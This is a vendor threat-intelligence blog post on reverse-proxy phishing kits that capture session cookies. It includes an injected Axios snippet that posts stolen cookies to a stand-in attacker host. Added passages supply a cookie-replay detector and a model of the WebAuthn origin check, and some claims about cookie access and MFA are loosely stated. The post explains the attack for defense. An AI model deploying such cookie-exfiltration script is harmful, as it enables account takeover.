
Axios Abuse & Salty 2FA Kits: A New Phishing Threat

The Birdling's threat intelligence team breaks down a sophisticated phishing attack that abuses the Axios JS library and uses "Salty" 2FA kits to steal session cookies.

Chris C. / COO

September 9, 2025

Threat Intelligence & Attack Reports, Phishing & Social Engineering

Multi-Factor Authentication (MFA) has become the gold standard for account security. For years, organizations have rightly pushed for its adoption, believing it to be a near-impenetrable shield against credential theft. However, our intelligence shows a clear trend: threat actors are no longer focusing on trying to break the shield but are simply walking around it (I mean, who chooses the hard way out?).

A new generation of phishing attacks is actively bypassing MFA by focusing not on the password but on the session cookie that is generated after a successful login. Our latest analysis reveals a specific attack chain that leverages a legitimate, widely used JavaScript library, Axios, in combination with advanced phishing kits to achieve this.

The attack relies on a clever man-in-the-middle (MitM) reverse proxy setup. Instead of creating a fake login page that looks like the real one, the attacker's server acts as an invisible bridge between the victim and the legitimate service (e.g., Microsoft 365, Google Workspace).

Step 1: The attack begins with a standard phishing email or SMS, urging the user to log in to their account due to a supposed security alert or pending invoice. The link points to the attacker's server.

Step 2: When the victim clicks the link, they are not sent to a fake page. The attacker's server fetches the real login page from the legitimate service and presents it to the victim. The victim sees the correct URL, the correct SSL certificate, and a pixel-perfect login form because they are interacting with the real thing, just proxied through the attacker.

Step 3: The victim enters their username and password. The attacker's server captures these credentials and passes them on to the legitimate service. The legitimate service then challenges the user for their MFA code (e.g., from an authenticator app). The victim enters the code, which is also captured by the attacker and passed along.

This is where phishing kits like "Salty 2FA" come into play. These kits are pre-built tools that automate this entire reverse proxy and interception process, making it easy for even moderately skilled attackers to deploy.

Step 4: After the victim successfully authenticates with their password and MFA code, the legitimate service sends back a session cookie to the user's browser to keep them logged in. Because the attacker is in the middle of the connection, they intercept this session cookie before it ever reaches the victim.

The password was useful, but the session cookie is what is really sought after.

This is where our latest intelligence reveals a novel technique. How does the attacker get the stolen session cookie from their server back to their own machine for use?

We have observed phishing kits that inject a small, malicious JavaScript payload into the proxied webpage. This script uses the Axios library, a very popular and legitimate tool for making HTTP requests, which is often already present on modern web applications.

  1. The phishing kit's server-side code captures the Set-Cookie header from the legitimate service's response.

  2. It injects a script into the HTML sent to the victim's browser.

  3. This script uses Axios to make a silent, background POST request to a separate server controlled by the attacker (a "drop server"). The body of this request contains the stolen session cookie.

// Malicious injected script (simplified example)
const stolenCookie = document.cookie;
axios.post("https://attacker-drop-server.com/collector", {
  cookie: stolenCookie,
  victim_ip: "...",
});

Because Axios is a legitimate library, this malicious traffic is much less likely to be flagged by network security tools than a suspicious custom script. The attacker now has the victim's active session cookie and can inject it into their own browser, gaining full, authenticated access to the victim's account without ever needing the password or MFA code again (until the session expires).
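The replayed cookie described above leaves a signal that an identity provider or SIEM can catch: the same session cookie presented from a different network and client shortly after it was issued, which is also the condition that conditional access policies act on. The detector below is an added example, not code from The Birdling, from Axios or from any phishing kit; its log format, field layout, sample lines, session identifiers and the 30-minute window are all constructed assumptions.

```python
"""Flag session cookies that are presented from a new IP address or user agent
shortly after first use: the trace left when a proxied session cookie is
replayed from an attacker's own browser. Added illustration; log format and
sample lines are constructed."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed identity-provider access log. Fields (space separated):
# timestamp, user, session id (a hash of the cookie, never the raw value),
# client IP, user agent summary.
SAMPLE_LOG = """\
2025-09-09T08:01:10Z alice sess-7f3a 203.0.113.10 Chrome/128-Windows
2025-09-09T08:01:55Z alice sess-7f3a 203.0.113.10 Chrome/128-Windows
2025-09-09T08:03:40Z alice sess-7f3a 198.51.100.77 Firefox/130-Linux
2025-09-09T08:10:02Z bob sess-91c2 192.0.2.5 Safari/17-macOS
2025-09-09T09:30:00Z bob sess-91c2 192.0.2.5 Safari/17-macOS
"""

Event = Tuple[datetime, str, str, str, str]


def parse_log(text: str) -> List[Event]:
    """Parse the constructed log format into (timestamp, user, sid, ip, ua) tuples."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, sid, ip, ua = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, sid, ip, ua))
    return events


def find_hijacked_sessions(events: List[Event], window: timedelta = timedelta(minutes=30)):
    """Return one alert per session whose cookie was presented from a different
    IP address or user agent within `window` of the session's first appearance.

    Each alert is (session_id, user, first_ip, first_ua, new_ip, new_ua).
    A session is reported only once, on its first anomalous use."""
    first_seen: Dict[str, Tuple[datetime, str, str, str]] = {}
    alerted = set()
    alerts = []
    for ts, user, sid, ip, ua in sorted(events):
        if sid not in first_seen:
            first_seen[sid] = (ts, user, ip, ua)   # baseline: where the cookie was issued/used first
            continue
        t0, _, ip0, ua0 = first_seen[sid]
        changed = ip != ip0 or ua != ua0
        if changed and ts - t0 <= window and sid not in alerted:
            alerted.add(sid)
            alerts.append((sid, user, ip0, ua0, ip, ua))
    return alerts


if __name__ == "__main__":
    for alert in find_hijacked_sessions(parse_log(SAMPLE_LOG)):
        sid, user, ip0, ua0, ip, ua = alert
        print(f"possible session replay: {user} {sid} first {ip0} ({ua0}) then {ip} ({ua})")
```

On the constructed sample, alice's cookie is used from a second address and browser two minutes after issuance and is reported; bob's session, reused from the same client, is not. In production the IP comparison should be made at the ASN or geolocation level rather than exact address, because mobile and corporate NAT users legitimately change address, and the alert should feed a session-revocation action rather than only a log line, since the attacker's access persists until the cookie expires.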

This attack technique effectively renders traditional MFA useless against a dedicated attacker. The business impact is severe: it can lead to Business Email Compromise (BEC), internal data theft, and further propagation of attacks within the organization.

How to Defend:

  1. Phishing-Resistant MFA: This is the most important defense. Move away from push notifications and one-time codes. Implement FIDO2/WebAuthn-based authenticators like YubiKeys or platform authenticators (Windows Hello, Face ID). These methods cryptographically bind the login session to the user's device, making it impossible for an attacker to replay a stolen session cookie from a different machine.

  2. Advanced Email Security: A sophisticated email security gateway like The Birdling's can often detect the subtle signs of a reverse proxy phishing link before it ever reaches the user's inbox.

  3. Continuous User Training: While training alone is not enough, teaching users to be suspicious of any unexpected login request and to verify the source is a critical layer of defense.

  4. Conditional Access Policies: Implementing policies that flag or block logins from unfamiliar locations or networks can help mitigate the impact of a stolen session.
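The first defense above rests on one property of FIDO2/WebAuthn worth seeing in code: before the authenticator signs a login assertion, the browser records the origin of the page that requested it in clientDataJSON, and the relying party rejects any assertion whose origin is not its own. A reverse proxy sits on a different origin, so the assertion it relays fails verification even though the user did everything right. The model below is an added example, not code from The Birdling or from any WebAuthn library; it stands in HMAC for the authenticator's per-credential signing key, and the origins, challenge and RP ID are constructed.

```python
"""Model of the WebAuthn origin check that defeats reverse-proxy phishing.
Added illustration: HMAC replaces the authenticator's asymmetric signature so
the script runs offline; origins and RP ID are constructed."""
import hashlib
import hmac
import json
import os

RP_ID = "login.example.com"                        # constructed relying-party ID
RP_ORIGIN = "https://login.example.com"            # constructed legitimate origin
PROXY_ORIGIN = "https://login.example-proxy.net"   # constructed reverse-proxy origin
RP_ID_HASH = hashlib.sha256(RP_ID.encode()).digest()
DEVICE_KEY = b"constructed-per-credential-secret"  # stands in for the private key


def authenticator_sign(origin: str, challenge: bytes) -> dict:
    """Browser + authenticator. The browser writes the origin it is actually
    displaying (the proxy's origin when phished); the authenticator then signs
    authenticatorData || SHA-256(clientDataJSON)."""
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": challenge.hex(),
        "origin": origin,
    }).encode()
    # rpIdHash || flags (UP set) || 32-bit signature counter
    authenticator_data = RP_ID_HASH + b"\x01" + (0).to_bytes(4, "big")
    signed = authenticator_data + hashlib.sha256(client_data).digest()
    signature = hmac.new(DEVICE_KEY, signed, hashlib.sha256).digest()
    return {"clientDataJSON": client_data,
            "authenticatorData": authenticator_data,
            "signature": signature}


def rp_verify(assertion: dict, expected_challenge: bytes) -> bool:
    """Relying-party side of the assertion check, in the order a server runs it."""
    data = json.loads(assertion["clientDataJSON"])
    if data.get("type") != "webauthn.get":
        return False
    if not hmac.compare_digest(data.get("challenge", ""), expected_challenge.hex()):
        return False                                   # replayed or stale challenge
    if data.get("origin") != RP_ORIGIN:
        return False                                   # the check a proxy cannot satisfy
    if assertion["authenticatorData"][:32] != RP_ID_HASH:
        return False                                   # credential scoped to another RP
    signed = assertion["authenticatorData"] + hashlib.sha256(assertion["clientDataJSON"]).digest()
    expected = hmac.new(DEVICE_KEY, signed, hashlib.sha256).digest()
    return hmac.compare_digest(expected, assertion["signature"])


def demo():
    """Returns (genuine_accepted, proxied_accepted) for a fresh challenge."""
    challenge = os.urandom(32)
    genuine = authenticator_sign(RP_ORIGIN, challenge)
    phished = authenticator_sign(PROXY_ORIGIN, challenge)   # user on the proxied page
    return rp_verify(genuine, challenge), rp_verify(phished, challenge)


if __name__ == "__main__":
    print(demo())  # genuine accepted, proxied rejected
```

In a real browser the proxied case fails even earlier: a credential registered for login.example.com cannot be exercised at all from a page on example-proxy.net, because the browser only allows an RP ID that is a registrable suffix of the page's origin. The origin field in clientDataJSON is the server-side backstop for the same rule, which is why a code or push approval relayed by the proxy works but a WebAuthn assertion does not.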

The threat landscape is constantly evolving. We cannot afford to become complacent, even with strong controls like MFA in place.

The Birdling's Managed Defense services are designed to combat these advanced threats by integrating best-in-class email security and monitoring for the anomalous behavior associated with session hijacking. Contact us for a threat briefing to learn more.
